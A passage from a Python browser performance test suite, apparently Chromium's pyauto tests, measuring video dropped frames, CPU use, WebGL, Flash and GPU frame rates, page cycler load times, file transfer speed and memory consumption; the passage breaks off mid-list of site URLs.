def _VerifyVideoTotalBytes(self):
"""Returns true if video total bytes information is available."""
return self.GetVideoTotalBytes() > 0
def _VerifyVideoLoadedBytes(self):
"""Returns true if video loaded bytes information is available."""
return self.GetVideoLoadedBytes() > 0
def StartVideoForPerformance(self, video_id='zuzaxlddWbk'):
"""Start the test video with all required buffering."""
self.PlayVideoAndAssert(video_id)
self.ExecuteJavascript("""
ytplayer.setPlaybackQuality('hd720');
window.domAutomationController.send('');
""")
self.AssertPlayerState(state=self.is_playing,
msg='Player did not enter the playing state')
self.assertTrue(
self.WaitUntil(self._VerifyVideoTotalBytes, expect_retval=True),
msg='Failed to get video total bytes information.')
self.assertTrue(
self.WaitUntil(self._VerifyVideoLoadedBytes, expect_retval=True),
msg='Failed to get video loaded bytes information')
loaded_video_bytes = self.GetVideoLoadedBytes()
total_video_bytes = self.GetVideoTotalBytes()
self.PauseVideo()
logging.info('total_video_bytes: %f', total_video_bytes)
# Wait for the video to finish loading.
while total_video_bytes > loaded_video_bytes:
loaded_video_bytes = self.GetVideoLoadedBytes()
logging.info('loaded_video_bytes: %f', loaded_video_bytes)
time.sleep(1)
self.PlayVideo()
# Ignore first 10 seconds of video playing so we get smooth videoplayback.
time.sleep(10)
def testYoutubeDroppedFrames(self):
"""Measures the Youtube video dropped frames/second. Runs for 60 secs.
This test measures Youtube video dropped frames for three different types
of videos like slow, normal and fast motion.
"""
youtube_video = {'Slow': 'VT1-sitWRtY',
'Normal': '2tqK_3mKQUw',
'Fast': '8ETDE0VGJY4',
}
for video_type in youtube_video:
logging.info('Running %s video.', video_type)
self.StartVideoForPerformance(youtube_video[video_type])
init_dropped_frames = self.GetVideoDroppedFrames()
total_dropped_frames = 0
dropped_fps = []
for iteration in xrange(60):
frames = self.GetVideoDroppedFrames() - init_dropped_frames
current_dropped_frames = frames - total_dropped_frames
dropped_fps.append(current_dropped_frames)
logging.info('Iteration %d of %d: %f dropped frames in the last '
'second', iteration + 1, 60, current_dropped_frames)
total_dropped_frames = frames
# Play the video for some time
time.sleep(1)
graph_description = 'YoutubeDroppedFrames' + video_type
self._PrintSummaryResults(graph_description, dropped_fps, 'frames',
'youtube_dropped_frames')
def testYoutubeCPU(self):
"""Measures the Youtube video CPU usage. Runs for 60 seconds.
Measures the Youtube video CPU usage (between 0 and 1), extrapolated to
totalframes in the video by taking dropped frames into account. For smooth
videoplayback this number should be < 0.5..1.0 on a hyperthreaded CPU.
"""
self.StartVideoForPerformance()
init_dropped_frames = self.GetVideoDroppedFrames()
logging.info('init_dropped_frames: %f', init_dropped_frames)
cpu_usage_start = self._GetCPUUsage()
total_shown_frames = 0
for sec_num in xrange(60):
# Play the video for some time.
time.sleep(1)
total_shown_frames = total_shown_frames + self.GetVideoFrames()
logging.info('total_shown_frames: %f', total_shown_frames)
total_dropped_frames = self.GetVideoDroppedFrames() - init_dropped_frames
logging.info('total_dropped_frames: %f', total_dropped_frames)
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = self._GetFractionNonIdleCPUTime(
cpu_usage_start, cpu_usage_end)
logging.info('fraction_non_idle_time: %f', fraction_non_idle_time)
total_frames = total_shown_frames + total_dropped_frames
# Counting extrapolation for utilization to play the video.
extrapolation_value = (fraction_non_idle_time *
(float(total_frames) / total_shown_frames))
logging.info('Youtube CPU extrapolation: %f', extrapolation_value)
# Video is still running so log some more detailed data.
self._LogProcessActivity()
self._OutputPerfGraphValue('YoutubeCPUExtrapolation', extrapolation_value,
'extrapolation', 'youtube_cpu_extrapolation')
class FlashVideoPerfTest(BasePerfTest):
"""General flash video performance tests."""
def FlashVideo1080P(self):
"""Measures total dropped frames and average FPS for a 1080p flash video.
This is a temporary test to be run manually for now, needed to collect some
performance statistics across different ChromeOS devices.
"""
# Open up the test webpage; it's assumed the test will start automatically.
webpage_url = 'http://www/~arscott/fl/FlashVideoTests.html'
self.assertTrue(self.AppendTab(pyauto.GURL(webpage_url)),
msg='Failed to append tab for webpage.')
# Wait until the test is complete.
js_is_done = """
window.domAutomationController.send(JSON.stringify(tests_done));
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_is_done, tab_index=1) == 'true',
timeout=300, expect_retval=True, retry_sleep=1),
msg='Timed out when waiting for test result.')
# Retrieve and output the test results.
js_results = """
window.domAutomationController.send(JSON.stringify(tests_results));
"""
test_result = eval(self.ExecuteJavascript(js_results, tab_index=1))
test_result[0] = test_result[0].replace('true', 'True')
test_result = eval(test_result[0]) # Webpage only does 1 test right now.
description = 'FlashVideo1080P'
result = test_result['averageFPS']
logging.info('Result for %s: %f FPS (average)', description, result)
self._OutputPerfGraphValue(description, result, 'FPS',
'flash_video_1080p_fps')
result = test_result['droppedFrames']
logging.info('Result for %s: %f dropped frames', description, result)
self._OutputPerfGraphValue(description, result, 'DroppedFrames',
'flash_video_1080p_dropped_frames')
class WebGLTest(BasePerfTest):
"""Tests for WebGL performance."""
def _RunWebGLTest(self, url, description, graph_name):
"""Measures FPS using a specified WebGL demo.
Args:
url: The string URL that, once loaded, will run the WebGL demo (default
WebGL demo settings are used, since this test does not modify any
settings in the demo).
description: A string description for this demo, used as a performance
value description. Should not contain any spaces.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
"""
self.assertTrue(self.AppendTab(pyauto.GURL(url)),
msg='Failed to append tab for %s.' % description)
get_fps_js = """
var fps_field = document.getElementById("fps");
var result = -1;
if (fps_field)
result = fps_field.innerHTML;
window.domAutomationController.send(JSON.stringify(result));
"""
# Wait until we start getting FPS values.
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(get_fps_js, tab_index=1) != '-1',
timeout=300, retry_sleep=1),
msg='Timed out when waiting for FPS values to be available.')
# Let the experiment run for 5 seconds before we start collecting perf
# measurements.
time.sleep(5)
# Collect the current FPS value each second for the next 30 seconds. The
# final result of this test will be the average of these FPS values.
fps_vals = []
for iteration in xrange(30):
fps = self.ExecuteJavascript(get_fps_js, tab_index=1)
fps = float(fps.replace('"', ''))
fps_vals.append(fps)
logging.info('Iteration %d of %d: %f FPS', iteration + 1, 30, fps)
time.sleep(1)
self._PrintSummaryResults(description, fps_vals, 'fps', graph_name)
def testWebGLAquarium(self):
"""Measures performance using the WebGL Aquarium demo."""
self._RunWebGLTest(
self.GetFileURLForDataPath('pyauto_private', 'webgl', 'aquarium',
'aquarium.html'),
'WebGLAquarium', 'webgl_demo')
def testWebGLField(self):
"""Measures performance using the WebGL Field demo."""
self._RunWebGLTest(
self.GetFileURLForDataPath('pyauto_private', 'webgl', 'field',
'field.html'),
'WebGLField', 'webgl_demo')
def testWebGLSpaceRocks(self):
"""Measures performance using the WebGL SpaceRocks demo."""
self._RunWebGLTest(
self.GetFileURLForDataPath('pyauto_private', 'webgl', 'spacerocks',
'spacerocks.html'),
'WebGLSpaceRocks', 'webgl_demo')
class GPUPerfTest(BasePerfTest):
"""Tests for GPU performance."""
def setUp(self):
"""Performs necessary setup work before running each test in this class."""
self._gpu_info_dict = self.EvalDataFrom(os.path.join(self.DataDir(),
'gpu', 'gpuperf.txt'))
self._demo_name_url_dict = self._gpu_info_dict['demo_info']
pyauto.PyUITest.setUp(self)
def _MeasureFpsOverTime(self, tab_index=0):
"""Measures FPS using a specified demo.
This function assumes that the demo is already loaded in the specified tab
index.
Args:
tab_index: The tab index, default is 0.
"""
# Let the experiment run for 5 seconds before we start collecting FPS
# values.
time.sleep(5)
# Collect the current FPS value each second for the next 10 seconds.
# Then return the average FPS value from among those collected.
fps_vals = []
for iteration in xrange(10):
fps = self.GetFPS(tab_index=tab_index)
fps_vals.append(fps['fps'])
time.sleep(1)
return Mean(fps_vals)
def _GetStdAvgAndCompare(self, avg_fps, description, ref_dict):
"""Computes the average and compare set of values with reference data.
Args:
avg_fps: Average fps value.
description: A string description for this demo, used as a performance
value description.
ref_dict: Dictionary which contains reference data for this test case.
Returns:
True, if the actual FPS value is within 10% of the reference FPS value,
or False, otherwise.
"""
std_fps = 0
status = True
# Load reference data according to platform.
platform_ref_dict = None
if self.IsWin():
platform_ref_dict = ref_dict['win']
elif self.IsMac():
platform_ref_dict = ref_dict['mac']
elif self.IsLinux():
platform_ref_dict = ref_dict['linux']
else:
self.assertFail(msg='This platform is unsupported.')
std_fps = platform_ref_dict[description]
# Compare reference data to average fps.
# We allow the average FPS value to be within 10% of the reference
# FPS value.
if avg_fps < (0.9 * std_fps):
logging.info('FPS difference exceeds threshold for: %s', description)
logging.info(' Average: %f fps', avg_fps)
logging.info('Reference Average: %f fps', std_fps)
status = False
else:
logging.info('Average FPS is actually greater than 10 percent '
'more than the reference FPS for: %s', description)
logging.info(' Average: %f fps', avg_fps)
logging.info(' Reference Average: %f fps', std_fps)
return status
def testLaunchDemosParallelInSeparateTabs(self):
"""Measures performance of demos in different tabs in same browser."""
# Launch all the demos parallel in separate tabs
counter = 0
all_demos_passed = True
ref_dict = self._gpu_info_dict['separate_tab_ref_data']
# Iterate through dictionary and append all url to browser
for url in self._demo_name_url_dict.iterkeys():
self.assertTrue(
self.AppendTab(pyauto.GURL(self._demo_name_url_dict[url])),
msg='Failed to append tab for %s.' % url)
counter += 1
# Assert number of tab count is equal to number of tabs appended.
self.assertEqual(self.GetTabCount(), counter + 1)
# Measures performance using different demos and compare it golden
# reference.
for url in self._demo_name_url_dict.iterkeys():
avg_fps = self._MeasureFpsOverTime(tab_index=counter)
# Get the reference value of fps and compare the results
if not self._GetStdAvgAndCompare(avg_fps, url, ref_dict):
all_demos_passed = False
counter -= 1
self.assertTrue(
all_demos_passed,
msg='One or more demos failed to yield an acceptable FPS value')
def testLaunchDemosInSeparateBrowser(self):
"""Measures performance by launching each demo in a separate tab."""
# Launch demos in the browser
ref_dict = self._gpu_info_dict['separate_browser_ref_data']
all_demos_passed = True
for url in self._demo_name_url_dict.iterkeys():
self.NavigateToURL(self._demo_name_url_dict[url])
# Measures performance using different demos.
avg_fps = self._MeasureFpsOverTime()
self.RestartBrowser()
# Get the standard value of fps and compare the rseults
if not self._GetStdAvgAndCompare(avg_fps, url, ref_dict):
all_demos_passed = False
self.assertTrue(
all_demos_passed,
msg='One or more demos failed to yield an acceptable FPS value')
def testLaunchDemosBrowseForwardBackward(self):
"""Measures performance of various demos in browser going back and forth."""
ref_dict = self._gpu_info_dict['browse_back_forward_ref_data']
url_array = []
desc_array = []
all_demos_passed = True
# Get URL/Description from dictionary and put in individual array
for url in self._demo_name_url_dict.iterkeys():
url_array.append(self._demo_name_url_dict[url])
desc_array.append(url)
for index in range(len(url_array) - 1):
# Launch demo in the Browser
if index == 0:
self.NavigateToURL(url_array[index])
# Measures performance using the first demo.
avg_fps = self._MeasureFpsOverTime()
status1 = self._GetStdAvgAndCompare(avg_fps, desc_array[index],
ref_dict)
# Measures performance using the second demo.
self.NavigateToURL(url_array[index + 1])
avg_fps = self._MeasureFpsOverTime()
status2 = self._GetStdAvgAndCompare(avg_fps, desc_array[index + 1],
ref_dict)
# Go Back to previous demo
self.TabGoBack()
# Measures performance for first demo when moved back
avg_fps = self._MeasureFpsOverTime()
status3 = self._GetStdAvgAndCompare(
avg_fps, desc_array[index] + '_backward',
ref_dict)
# Go Forward to previous demo
self.TabGoForward()
# Measures performance for second demo when moved forward
avg_fps = self._MeasureFpsOverTime()
status4 = self._GetStdAvgAndCompare(
avg_fps, desc_array[index + 1] + '_forward',
ref_dict)
if not all([status1, status2, status3, status4]):
all_demos_passed = False
self.assertTrue(
all_demos_passed,
msg='One or more demos failed to yield an acceptable FPS value')
class HTML5BenchmarkTest(BasePerfTest):
"""Tests for HTML5 performance."""
def testHTML5Benchmark(self):
"""Measures performance using the benchmark at html5-benchmark.com."""
self.NavigateToURL('http://html5-benchmark.com')
start_benchmark_js = """
benchmark();
window.domAutomationController.send("done");
"""
self.ExecuteJavascript(start_benchmark_js)
js_final_score = """
var score = "-1";
var elem = document.getElementById("score");
if (elem)
score = elem.innerHTML;
window.domAutomationController.send(score);
"""
# Wait for the benchmark to complete, which is assumed to be when the value
# of the 'score' DOM element changes to something other than '87485'.
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_final_score) != '87485',
timeout=900, retry_sleep=1),
msg='Timed out when waiting for final score to be available.')
score = self.ExecuteJavascript(js_final_score)
logging.info('HTML5 Benchmark final score: %f', float(score))
self._OutputPerfGraphValue('HTML5Benchmark', float(score), 'score',
'html5_benchmark')
class FileUploadDownloadTest(BasePerfTest):
"""Tests that involve measuring performance of upload and download."""
def setUp(self):
"""Performs necessary setup work before running each test in this class."""
self._temp_dir = tempfile.mkdtemp()
self._test_server = PerfTestServer(self._temp_dir)
self._test_server_port = self._test_server.GetPort()
self._test_server.Run()
self.assertTrue(self.WaitUntil(self._IsTestServerRunning),
msg='Failed to start local performance test server.')
BasePerfTest.setUp(self)
def tearDown(self):
"""Performs necessary cleanup work after running each test in this class."""
BasePerfTest.tearDown(self)
self._test_server.ShutDown()
pyauto_utils.RemovePath(self._temp_dir)
def _IsTestServerRunning(self):
"""Determines whether the local test server is ready to accept connections.
Returns:
True, if a connection can be made to the local performance test server, or
False otherwise.
"""
conn = None
try:
conn = urllib2.urlopen('http://localhost:%d' % self._test_server_port)
return True
except IOError, e:
return False
finally:
if conn:
conn.close()
def testDownload100MBFile(self):
"""Measures the time to download a 100 MB file from a local server."""
CREATE_100MB_URL = (
'http://localhost:%d/create_file_of_size?filename=data&mb=100' %
self._test_server_port)
DOWNLOAD_100MB_URL = 'http://localhost:%d/data' % self._test_server_port
DELETE_100MB_URL = ('http://localhost:%d/delete_file?filename=data' %
self._test_server_port)
# Tell the local server to create a 100 MB file.
self.NavigateToURL(CREATE_100MB_URL)
# Cleaning up downloaded files is done in the same way as in downloads.py.
# We first identify all existing downloaded files, then remove only those
# new downloaded files that appear during the course of this test.
download_dir = self.GetDownloadDirectory().value()
orig_downloads = []
if os.path.isdir(download_dir):
orig_downloads = os.listdir(download_dir)
def _CleanupAdditionalFilesInDir(directory, orig_files):
"""Removes the additional files in the specified directory.
This function will remove all files from |directory| that are not
specified in |orig_files|.
Args:
directory: A string directory path.
orig_files: A list of strings representing the original set of files in
the specified directory.
"""
downloads_to_remove = []
if os.path.isdir(directory):
downloads_to_remove = [os.path.join(directory, name)
for name in os.listdir(directory)
if name not in orig_files]
for file_name in downloads_to_remove:
pyauto_utils.RemovePath(file_name)
def _DownloadFile(url):
self.DownloadAndWaitForStart(url)
self.WaitForAllDownloadsToComplete(timeout=2 * 60 * 1000) # 2 minutes.
timings = []
for iteration in range(self._num_iterations + 1):
elapsed_time = self._MeasureElapsedTime(
lambda: _DownloadFile(DOWNLOAD_100MB_URL), num_invocations=1)
# Ignore the first iteration.
if iteration:
timings.append(elapsed_time)
logging.info('Iteration %d of %d: %f milliseconds', iteration,
self._num_iterations, elapsed_time)
self.SetDownloadShelfVisible(False)
_CleanupAdditionalFilesInDir(download_dir, orig_downloads)
self._PrintSummaryResults('Download100MBFile', timings, 'milliseconds',
'download_file')
# Tell the local server to delete the 100 MB file.
self.NavigateToURL(DELETE_100MB_URL)
def testUpload50MBFile(self):
"""Measures the time to upload a 50 MB file to a local server."""
# TODO(dennisjeffrey): Replace the use of XMLHttpRequest in this test with
# FileManager automation to select the upload file when crosbug.com/17903
# is complete.
START_UPLOAD_URL = (
'http://localhost:%d/start_upload?mb=50' % self._test_server_port)
EXPECTED_SUBSTRING = 'Upload complete'
def _IsUploadComplete():
js = """
result = "";
var div = document.getElementById("upload_result");
if (div)
result = div.innerHTML;
window.domAutomationController.send(result);
"""
return self.ExecuteJavascript(js).find(EXPECTED_SUBSTRING) >= 0
def _RunSingleUpload():
self.NavigateToURL(START_UPLOAD_URL)
self.assertTrue(
self.WaitUntil(_IsUploadComplete, timeout=120, expect_retval=True,
retry_sleep=0.10),
msg='Upload failed to complete before the timeout was hit.')
timings = []
for iteration in range(self._num_iterations + 1):
elapsed_time = self._MeasureElapsedTime(_RunSingleUpload)
# Ignore the first iteration.
if iteration:
timings.append(elapsed_time)
logging.info('Iteration %d of %d: %f milliseconds', iteration,
self._num_iterations, elapsed_time)
self._PrintSummaryResults('Upload50MBFile', timings, 'milliseconds',
'upload_file')
class FlashTest(BasePerfTest):
"""Tests to measure flash performance."""
def _RunFlashTestForAverageFPS(self, webpage_url, description, graph_name):
"""Runs a single flash test that measures an average FPS value.
Args:
webpage_url: The string URL to a webpage that will run the test.
description: A string description for this test.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
"""
# Open up the test webpage; it's assumed the test will start automatically.
self.assertTrue(self.AppendTab(pyauto.GURL(webpage_url)),
msg='Failed to append tab for webpage.')
# Wait until the final result is computed, then retrieve and output it.
js = """
window.domAutomationController.send(
JSON.stringify(final_average_fps));
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js, tab_index=1) != '-1',
timeout=300, expect_retval=True, retry_sleep=1),
msg='Timed out when waiting for test result.')
result = float(self.ExecuteJavascript(js, tab_index=1))
logging.info('Result for %s: %f FPS (average)', description, result)
self._OutputPerfGraphValue(description, result, 'FPS', graph_name)
def testFlashGaming(self):
"""Runs a simple flash gaming benchmark test."""
webpage_url = self.GetHttpURLForDataPath('pyauto_private', 'flash',
'FlashGamingTest2.html')
self._RunFlashTestForAverageFPS(webpage_url, 'FlashGaming', 'flash_fps')
def testFlashText(self):
"""Runs a simple flash text benchmark test."""
webpage_url = self.GetHttpURLForDataPath('pyauto_private', 'flash',
'FlashTextTest2.html')
self._RunFlashTestForAverageFPS(webpage_url, 'FlashText', 'flash_fps')
def testScimarkGui(self):
"""Runs the ScimarkGui benchmark tests."""
webpage_url = self.GetHttpURLForDataPath('pyauto_private', 'flash',
'scimarkGui.html')
self.assertTrue(self.AppendTab(pyauto.GURL(webpage_url)),
msg='Failed to append tab for webpage.')
js = 'window.domAutomationController.send(JSON.stringify(tests_done));'
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js, tab_index=1), timeout=300,
expect_retval='true', retry_sleep=1),
msg='Timed out when waiting for tests to complete.')
js_result = """
var result = {};
for (var i = 0; i < tests_results.length; ++i) {
var test_name = tests_results[i][0];
var mflops = tests_results[i][1];
var mem = tests_results[i][2];
result[test_name] = [mflops, mem]
}
window.domAutomationController.send(JSON.stringify(result));
"""
result = eval(self.ExecuteJavascript(js_result, tab_index=1))
for benchmark in result:
mflops = float(result[benchmark][0])
mem = float(result[benchmark][1])
if benchmark.endswith('_mflops'):
benchmark = benchmark[:benchmark.find('_mflops')]
logging.info('Results for ScimarkGui_%s:', benchmark)
logging.info(' %f MFLOPS', mflops)
logging.info(' %f MB', mem)
self._OutputPerfGraphValue('ScimarkGui-%s-MFLOPS' % benchmark, mflops,
'MFLOPS', 'scimark_gui_mflops')
self._OutputPerfGraphValue('ScimarkGui-%s-Mem' % benchmark, mem, 'MB',
'scimark_gui_mem')
class LiveGamePerfTest(BasePerfTest):
"""Tests to measure performance of live gaming webapps."""
def _RunLiveGamePerfTest(self, url, url_title_substring,
description, graph_name):
"""Measures performance metrics for the specified live gaming webapp.
This function connects to the specified URL to launch the gaming webapp,
waits for a period of time for the webapp to run, then collects some
performance metrics about the running webapp.
Args:
url: The string URL of the gaming webapp to analyze.
url_title_substring: A string that is expected to be a substring of the
webpage title for the specified gaming webapp. Used to verify that
the webapp loads correctly.
description: A string description for this game, used in the performance
value description. Should not contain any spaces.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
"""
self.NavigateToURL(url)
loaded_tab_title = self.GetActiveTabTitle()
self.assertTrue(url_title_substring in loaded_tab_title,
msg='Loaded tab title missing "%s": "%s"' %
(url_title_substring, loaded_tab_title))
cpu_usage_start = self._GetCPUUsage()
# Let the app run for 1 minute.
time.sleep(60)
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = self._GetFractionNonIdleCPUTime(
cpu_usage_start, cpu_usage_end)
logging.info('Fraction of CPU time spent non-idle: %f',
fraction_non_idle_time)
self._OutputPerfGraphValue(description + 'CpuBusy', fraction_non_idle_time,
'Fraction', graph_name + '_cpu_busy')
v8_heap_stats = self.GetV8HeapStats()
v8_heap_size = v8_heap_stats['v8_memory_used'] / (1024.0 * 1024.0)
logging.info('Total v8 heap size: %f MB', v8_heap_size)
self._OutputPerfGraphValue(description + 'V8HeapSize', v8_heap_size, 'MB',
graph_name + '_v8_heap_size')
def testAngryBirds(self):
"""Measures performance for Angry Birds."""
self._RunLiveGamePerfTest('http://chrome.angrybirds.com', 'Angry Birds',
'AngryBirds', 'angry_birds')
class BasePageCyclerTest(BasePerfTest):
"""Page class for page cycler tests.
Derived classes must implement StartUrl().
Environment Variables:
PC_NO_AUTO: if set, avoids automatically loading pages.
"""
MAX_ITERATION_SECONDS = 60
TRIM_PERCENT = 20
DEFAULT_USE_AUTO = True
# Page Cycler lives in src/data/page_cycler rather than src/chrome/test/data
DATA_PATH = os.path.abspath(
os.path.join(BasePerfTest.DataDir(), os.pardir, os.pardir,
os.pardir, 'data', 'page_cycler'))
def setUp(self):
"""Performs necessary setup work before running each test."""
super(BasePageCyclerTest, self).setUp()
self.use_auto = 'PC_NO_AUTO' not in os.environ
@classmethod
def DataPath(cls, subdir):
return os.path.join(cls.DATA_PATH, subdir)
def ExtraChromeFlags(self):
"""Ensures Chrome is launched with custom flags.
Returns:
A list of extra flags to pass to Chrome when it is launched.
"""
# Extra flags required to run these tests.
# The first two are needed for the test.
# The plugins argument is to prevent bad scores due to pop-ups from
# running an old version of something (like Flash).
return (super(BasePageCyclerTest, self).ExtraChromeFlags() +
['--js-flags="--expose_gc"',
'--enable-file-cookies',
'--allow-outdated-plugins'])
def WaitUntilStarted(self, start_url):
"""Check that the test navigates away from the start_url."""
js_is_started = """
var is_started = document.location.href !== "%s";
window.domAutomationController.send(JSON.stringify(is_started));
""" % start_url
self.assertTrue(
self.WaitUntil(lambda: self.ExecuteJavascript(js_is_started) == 'true',
timeout=10),
msg='Timed out when waiting to leave start page.')
def WaitUntilDone(self, url, iterations):
"""Check cookies for "__pc_done=1" to know the test is over."""
def IsDone():
cookies = self.GetCookie(pyauto.GURL(url)) # window 0, tab 0
return '__pc_done=1' in cookies
self.assertTrue(
self.WaitUntil(
IsDone,
timeout=(self.MAX_ITERATION_SECONDS * iterations),
retry_sleep=1),
msg='Timed out waiting for page cycler test to complete.')
def CollectPagesAndTimes(self, url):
"""Collect the results from the cookies."""
pages, times = None, None
cookies = self.GetCookie(pyauto.GURL(url)) # window 0, tab 0
for cookie in cookies.split(';'):
if '__pc_pages' in cookie:
pages_str = cookie.split('=', 1)[1]
pages = pages_str.split(',')
elif '__pc_timings' in cookie:
times_str = cookie.split('=', 1)[1]
times = [float(t) for t in times_str.split(',')]
self.assertTrue(pages and times,
msg='Unable to find test results in cookies: %s' % cookies)
return pages, times
def IteratePageTimes(self, pages, times, iterations):
"""Regroup the times by the page.
Args:
pages: the list of pages
times: e.g. [page1_iter1, page2_iter1, ..., page1_iter2, page2_iter2, ...]
iterations: the number of times for each page
Yields:
(pageN, [pageN_iter1, pageN_iter2, ...])
"""
num_pages = len(pages)
num_times = len(times)
expected_num_times = num_pages * iterations
self.assertEqual(
expected_num_times, num_times,
msg=('num_times != num_pages * iterations: %s != %s * %s, times=%s' %
(num_times, num_pages, iterations, times)))
for i, page in enumerate(pages):
yield page, list(itertools.islice(times, i, None, num_pages))
def CheckPageTimes(self, pages, times, iterations):
"""Assert that all the times are greater than zero."""
failed_pages = []
for page, times in self.IteratePageTimes(pages, times, iterations):
failed_times = [t for t in times if t <= 0.0]
if failed_times:
failed_pages.append((page, failed_times))
if failed_pages:
self.fail('Pages with unexpected times: %s' % failed_pages)
def TrimTimes(self, times, percent):
"""Return a new list with |percent| number of times trimmed for each page.
Removes the largest and smallest values.
"""
iterations = len(times)
times = sorted(times)
num_to_trim = int(iterations * float(percent) / 100.0)
logging.debug('Before trimming %d: %s' % (num_to_trim, times))
a = num_to_trim / 2
b = iterations - (num_to_trim / 2 + num_to_trim % 2)
trimmed_times = times[a:b]
logging.debug('After trimming: %s', trimmed_times)
return trimmed_times
def ComputeFinalResult(self, pages, times, iterations):
"""The final score that is calculated is a geometric mean of the
arithmetic means of each page's load time, and we drop the
upper/lower 20% of the times for each page so they don't skew the
mean. The geometric mean is used for the final score because the
time range for any given site may be very different, and we don't
want slower sites to weight more heavily than others.
"""
self.CheckPageTimes(pages, times, iterations)
page_means = [
Mean(self.TrimTimes(times, percent=self.TRIM_PERCENT))
for _, times in self.IteratePageTimes(pages, times, iterations)]
return GeometricMean(page_means)
def StartUrl(self, test_name, iterations):
"""Return the URL to used to start the test.
Derived classes must implement this.
"""
raise NotImplemented
def RunPageCyclerTest(self, name, description):
"""Runs the specified PageCycler test.
Args:
name: the page cycler test name (corresponds to a directory or test file)
description: a string description for the test
"""
iterations = self._num_iterations
start_url = self.StartUrl(name, iterations)
self.NavigateToURL(start_url)
if self.use_auto:
self.WaitUntilStarted(start_url)
self.WaitUntilDone(start_url, iterations)
pages, times = self.CollectPagesAndTimes(start_url)
final_result = self.ComputeFinalResult(pages, times, iterations)
logging.info('%s page cycler final result: %f' %
(description, final_result))
self._OutputPerfGraphValue(description + '_PageCycler', final_result,
'milliseconds', graph_name='PageCycler')
class PageCyclerTest(BasePageCyclerTest):
"""Tests to run various page cyclers.
Environment Variables:
PC_NO_AUTO: if set, avoids automatically loading pages.
"""
def _PreReadDataDir(self, subdir):
"""This recursively reads all of the files in a given url directory.
The intent is to get them into memory before they are used by the benchmark.
Args:
subdir: a subdirectory of the page cycler data directory.
"""
def _PreReadDir(dirname, names):
for rfile in names:
with open(os.path.join(dirname, rfile)) as fp:
fp.read()
for root, dirs, files in os.walk(self.DataPath(subdir)):
_PreReadDir(root, files)
def StartUrl(self, test_name, iterations):
# Must invoke GetFileURLForPath before appending parameters to the URL,
# otherwise those parameters will get quoted.
start_url = self.GetFileURLForPath(self.DataPath(test_name), 'start.html')
start_url += '?iterations=%d' % iterations
if self.use_auto:
start_url += '&auto=1'
return start_url
def RunPageCyclerTest(self, dirname, description):
"""Runs the specified PageCycler test.
Args:
dirname: directory containing the page cycler test
description: a string description for the test
"""
self._PreReadDataDir('common')
self._PreReadDataDir(dirname)
super(PageCyclerTest, self).RunPageCyclerTest(dirname, description)
def testMoreJSFile(self):
self.RunPageCyclerTest('morejs', 'MoreJSFile')
def testAlexaFile(self):
self.RunPageCyclerTest('alexa_us', 'Alexa_usFile')
def testBloatFile(self):
self.RunPageCyclerTest('bloat', 'BloatFile')
def testDHTMLFile(self):
self.RunPageCyclerTest('dhtml', 'DhtmlFile')
def testIntl1File(self):
self.RunPageCyclerTest('intl1', 'Intl1File')
def testIntl2File(self):
self.RunPageCyclerTest('intl2', 'Intl2File')
def testMozFile(self):
self.RunPageCyclerTest('moz', 'MozFile')
def testMoz2File(self):
self.RunPageCyclerTest('moz2', 'Moz2File')
class MemoryTest(BasePerfTest):
"""Tests to measure memory consumption under different usage scenarios."""
def ExtraChromeFlags(self):
"""Launches Chrome with custom flags.
Returns:
A list of extra flags to pass to Chrome when it is launched.
"""
# Ensure Chrome assigns one renderer process to each tab.
return super(MemoryTest, self).ExtraChromeFlags() + ['--process-per-tab']
def _RecordMemoryStats(self, description, when, duration):
"""Outputs memory statistics to be graphed.
Args:
description: A string description for the test. Should not contain
spaces. For example, 'MemCtrl'.
when: A string description of when the memory stats are being recorded
during test execution (since memory stats may be recorded multiple
times during a test execution at certain "interesting" times). Should
not contain spaces.
duration: The number of seconds to sample data before outputting the
memory statistics.
"""
mem = self.GetMemoryStatsChromeOS(duration)
measurement_types = [
('gem_obj', 'GemObj'),
('gtt', 'GTT'),
('mem_free', 'MemFree'),
('mem_available', 'MemAvail'),
('mem_shared', 'MemShare'),
('mem_cached', 'MemCache'),
('mem_anon', 'MemAnon'),
('mem_file', 'MemFile'),
('mem_slab', 'MemSlab'),
('browser_priv', 'BrowPriv'),
('browser_shared', 'BrowShar'),
('gpu_priv', 'GpuPriv'),
('gpu_shared', 'GpuShar'),
('renderer_priv', 'RendPriv'),
('renderer_shared', 'RendShar'),
]
for type_key, type_string in measurement_types:
if type_key not in mem:
continue
self._OutputPerfGraphValue(
'%s-Min%s-%s' % (description, type_string, when),
mem[type_key]['min'], 'KB', '%s-%s' % (description, type_string))
self._OutputPerfGraphValue(
'%s-Max%s-%s' % (description, type_string, when),
mem[type_key]['max'], 'KB', '%s-%s' % (description, type_string))
self._OutputPerfGraphValue(
'%s-End%s-%s' % (description, type_string, when),
mem[type_key]['end'], 'KB', '%s-%s' % (description, type_string))
def _RunTest(self, tabs, description, duration):
"""Runs a general memory test.
Args:
tabs: A list of strings representing the URLs of the websites to open
during this test.
description: A string description for the test. Should not contain
spaces. For example, 'MemCtrl'.
duration: The number of seconds to sample data before outputting memory
statistics.
"""
self._RecordMemoryStats(description, '0Tabs0', duration)
for iteration_num in xrange(2):
for site in tabs:
self.AppendTab(pyauto.GURL(site))
self._RecordMemoryStats(description,
'%dTabs%d' % (len(tabs), iteration_num + 1),
duration)
for _ in xrange(len(tabs)):
self.CloseTab(tab_index=1)
self._RecordMemoryStats(description, '0Tabs%d' % (iteration_num + 1),
duration)
def testOpenCloseTabsControl(self):
"""Measures memory usage when opening/closing tabs to about:blank."""
tabs = ['about:blank'] * 10
self._RunTest(tabs, 'MemCtrl', 15)
def testOpenCloseTabsLiveSites(self):
"""Measures memory usage when opening/closing tabs to live sites."""
tabs = [
'http://www.google.com/gmail',
'http://www.google.com/calendar',
'http://www.google.com/plus',
'http://www.google.com/youtube',
'http://www.nytimes.com',
'http://www.cnn.com',
'http://www.facebook.com/zuck',
'http://www.techcrunch.com',
'http://www.theverge.com',
'http://www.yahoo.com',
